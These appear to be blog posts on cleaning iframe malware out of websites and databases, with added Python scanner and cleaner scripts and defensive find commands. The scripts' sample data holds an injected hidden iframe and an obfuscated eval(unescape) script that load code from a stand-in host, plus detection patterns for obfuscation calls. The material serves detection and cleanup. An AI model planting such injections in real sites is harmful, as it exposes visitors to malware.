Malware in database

I got a report these days about a site being flagged as a forgery site by Google Safe Browsing. Usually these situations are easy to handle, since most of the time there is a flaw in a PHP script that allows attackers to upload or modify .php/.js/.css files. Doing a find for the injected code or restoring the files fixes the problem.

This time I did not find any modified file, but the sites were still being reported as containing malware. Then I checked the database, and it seems there were some iframe entries redirecting to malware sites. Truncating and reimporting the affected tables solved the issue.

The question remains: is there any malware scanner for databases? What if, instead of an iframe, some other hardcoded strings had been set? Most likely I would have missed those.
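As an added example (not a tool from the original post), here is a minimal "malware scanner for databases" in Python: it walks every table, reads every text-typed column, and flags values carrying injection markers such as iframes, remote scripts, hidden-element styles and common JS/PHP obfuscation calls. sqlite3 stands in for MySQL/MariaDB so it runs offline; the indicator list, the schema and the sample rows are all constructed for the demonstration.

```python
"""Added example: scan every text column of every table for injected HTML/JS.

sqlite3 stands in for MySQL/MariaDB so the script runs offline; the schema
and rows in build_sample_db() are constructed for this demo.
"""
import re
import sqlite3

# Indicator patterns. This list is an assumption for the example, not a
# complete signature set; tune it to the CMS in use.
INDICATORS = {
    "iframe": re.compile(r"<iframe\b", re.I),
    "remote_script": re.compile(r"<script\b[^>]*\bsrc\s*=", re.I),
    "hidden_style": re.compile(
        r"visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*[\"']?0\b", re.I),
    "js_obfuscation": re.compile(r"eval\s*\(|unescape\s*\(|String\.fromCharCode", re.I),
    "php_obfuscation": re.compile(r"base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(", re.I),
}


def text_columns(conn, table):
    """Column names declared as a textual type (TEXT, VARCHAR, CLOB or untyped)."""
    cols = []
    for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
        if re.search(r"char|text|clob|^$", ctype or "", re.I):
            cols.append(name)
    return cols


def scan_database(conn):
    """Return findings as (table, column, rowid, indicator, excerpt) tuples.

    The scanner only reports; removal is left to a human who has looked at the
    excerpt, because some indicators (e.g. display:none) also occur in
    legitimate content."""
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        cols = text_columns(conn, table)
        if not cols:
            continue
        col_list = ", ".join(f'"{c}"' for c in cols)
        for rowid, *values in conn.execute(f'SELECT rowid, {col_list} FROM "{table}"'):
            for col, value in zip(cols, values):
                if not isinstance(value, str):
                    continue
                for indicator, pattern in INDICATORS.items():
                    match = pattern.search(value)
                    if match:
                        # Keep a little context around the hit so the report is reviewable.
                        excerpt = value[max(0, match.start() - 20):match.end() + 40]
                        findings.append((table, col, rowid, indicator, excerpt))
    return findings


def build_sample_db():
    """Constructed CMS-like sample: one clean post, one post with an injected
    hidden iframe, and a site option holding an obfuscated script."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT, views INTEGER);
        CREATE TABLE options (name VARCHAR(64), value TEXT);
        INSERT INTO posts VALUES (1, 'Hello', '<p>Welcome to the site.</p>', 10);
        INSERT INTO posts VALUES (2, 'News', '<p>Update.</p><iframe src="http://redirect.example/in.php" width=0 height=0 style="visibility:hidden"></iframe>', 3);
        INSERT INTO options VALUES ('footer_html', '<script>eval(unescape("%3Cscript%20src%3D%22http%3A//redirect.example/a.js%22%3E"))</script>');
        INSERT INTO options VALUES ('site_name', 'My Blog');
    """)
    return conn


if __name__ == "__main__":
    for table, col, rowid, indicator, excerpt in scan_database(build_sample_db()):
        print(f"{table}.{col} rowid={rowid} [{indicator}]: {excerpt!r}")
```

Against a real MySQL/MariaDB instance the two sqlite-specific queries (PRAGMA table_info and sqlite_master) would be replaced by lookups in information_schema.columns, with the rest unchanged. The script deliberately does not delete anything: the excerpt is there so the hit can be checked by eye before the row is fixed or the table is restored from a known-good dump.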

How to remove malware, iframe virus from your site

I guess many of you have already had this issue with the iframe malware.

In my research I found out that this isn't the fault of the Linux/Windows hosting server. This issue is caused by a Windows virus that sniffs the internet connection for FTP user names and passwords. It then silently downloads every file (or only the index/default files) from the remote FTP server to the infected Windows PC, adds the iframe or JavaScript code, and uploads the files back. So, before removing this virus from the remote servers, check your computers. The virus is known as Trojan.Script.Iframe.

After scanning your system carefully, consider no longer using FTP. Download WinSCP and stop storing your passwords locally. Then change your passwords.

To get the list of infected files I use either grep or find from any shell prompt (you will need SSH access to the server):

or with find:

find "$PWD" \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "income" {} \;

You can also check the timestamps of the files: if you see changes to index.html or any other file that you did not make on purpose, it means you are infected. I'm using the -mtime parameter of find to check for infected files:

find . -mtime -2

This will list all files that were modified in the last 48 hours.

Malware Removal
You can remove the malware by just deleting the code (sample above) from the affected files. If you need to clean up hundreds of infected files you can do the following:
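As an added example (not the author's own cleanup procedure), the following Python script puts the two steps above together: it finds web files modified within the last N hours, checks them for an injected hidden iframe or remote script, and can strip that snippet from each hit while keeping a .bak copy. The injection pattern, the extension list and the sample site tree are constructed for this demonstration.

```python
"""Added example: find recently modified web files that carry an injected
iframe/script, and strip the snippet while keeping a backup.

Not the original post's tooling; the pattern, extensions and sample tree are
constructed for the demo.
"""
import os
import re
import shutil
import tempfile
import time

WEB_EXTENSIONS = {".php", ".html", ".htm", ".js"}

# Shape of the snippet to cut out: an iframe hidden via style/size, or a
# script tag pulling from a remote host. Matched as a whole tag so that the
# rest of the page is left intact. Assumed pattern for this example.
INJECTED = re.compile(
    r"<iframe\b[^>]*\b(?:visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*[\"']?0\b)"
    r"[^>]*>.*?</iframe>"
    r"|<script\b[^>]*\bsrc\s*=\s*[\"']https?://[^\"']+[\"'][^>]*>\s*</script>",
    re.I | re.S,
)


def _read(path):
    # latin-1 round-trips any byte sequence unchanged, so non-UTF-8 files survive a rewrite.
    with open(path, encoding="latin-1") as fh:
        return fh.read()


def recently_modified(root, hours):
    """Yield web files under root with mtime within the last `hours` hours
    (the find -mtime idea, with hour granularity)."""
    cutoff = time.time() - hours * 3600
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if os.path.splitext(fn)[1].lower() in WEB_EXTENSIONS and os.path.getmtime(path) >= cutoff:
                yield path


def is_infected(path):
    """True if the file contains the injected snippet."""
    return INJECTED.search(_read(path)) is not None


def infected_files(root, hours=48):
    """Sorted absolute paths of recently modified web files that are infected."""
    return sorted(p for p in recently_modified(root, hours) if is_infected(p))


def clean_file(path):
    """Remove injected snippets from one file; writes path + '.bak' first.
    Returns the number of snippets removed (0 means the file was left untouched)."""
    original = _read(path)
    cleaned, count = INJECTED.subn("", original)
    if count:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(cleaned)
    return count


def build_sample_site():
    """Constructed sample tree: a clean page, an injected page, an injected page
    that is 10 days old, and a non-web file that must be ignored."""
    root = tempfile.mkdtemp(prefix="site_")
    os.makedirs(os.path.join(root, "blog"))
    clean = "<html><body><h1>Home</h1></body></html>\n"
    bad = ('<html><body><h1>Home</h1>'
           '<iframe src="http://redirect.example/in.php" width=0 height=0 '
           'style="visibility:hidden"></iframe></body></html>\n')
    files = {
        "index.html": clean,
        os.path.join("blog", "index.php"): bad,
        "old.htm": bad,
        "notes.txt": bad,
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(content)
    old = time.time() - 10 * 86400
    os.utime(os.path.join(root, "old.htm"), (old, old))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for hit in infected_files(site, hours=48):
        print(f"cleaned {hit}: removed {clean_file(hit)} snippet(s), backup in {hit}.bak")
```

Run it with a real document root and a window that covers the suspicious timestamps you saw with find -mtime; review the .bak files (or a diff against them) before deleting the backups, and widen the window if old.htm-style files outside it turn out to be infected as well.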

Malware search and remove

It seems these things happen a lot these days. If you have an SSH account, such as root or another valid user, you can search for and remove the infected code from your files more easily.

First of all, try to find a file that was infected and check its date with:

